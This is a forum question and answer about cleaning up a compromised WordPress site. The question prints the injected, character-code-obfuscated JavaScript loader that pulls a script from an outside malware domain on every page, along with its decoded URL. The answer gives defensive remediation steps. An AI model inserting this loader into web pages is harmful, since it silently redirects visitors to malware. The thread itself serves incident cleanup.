Remove Two Lines of JS Code at the Beginning of Every Document on Wordpress

Question

My website is redirecting to a malware website and I have identified that at the beginning of every page there is a code. See below -

var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = String.fromCharCode(104,116,116,112,115,58,47,47,115,99,114,105,112,116,115,46,116,114,97,115,110,97,108,116,101,109,121,114,101,99,111,114,100,115,46,99,111,109,47,116,97,108,107,46,106,115,63,116,114,97,99,107,61,114,38,115,117,98,105,100,61,48,54,48); s.src=pl; 

I translated this to this -

var gdjfgjfgj235f = 1; var d=document;var s=d.createElement('script'); s.type='text/javascript'; s.async=true;
var pl = https://scripts.trasnaltemyrecords.com/talk.js?track=r&subid=060 s.src=pl; 

But this code is on every single Javascript file, index.php, and many other PHP files. How can I get rid of this script which is redirecting my page?

I tried several things but nothing is working. Also, I am not able to log in to the WordPress dashboard as the URL will keep redirecting. No matter what URL I use, I always end up redirecting.

Please help me with this. I am trying for over a week now and nothing fruitful came my way.

Answer 1

Download your files locally.

Use Notepad++ "Find in files" ( CTRL+SHIFT+F for Find in Files) to do a mass find and replace. You can do it for every single file at once and just re-upload your files. Use the settings I put into the screenshot here.

Couldn't hurt to block the URL in your firewall for good measure.

Also, if you see this file in the root directory, delete it: wp-craft-report-conf.php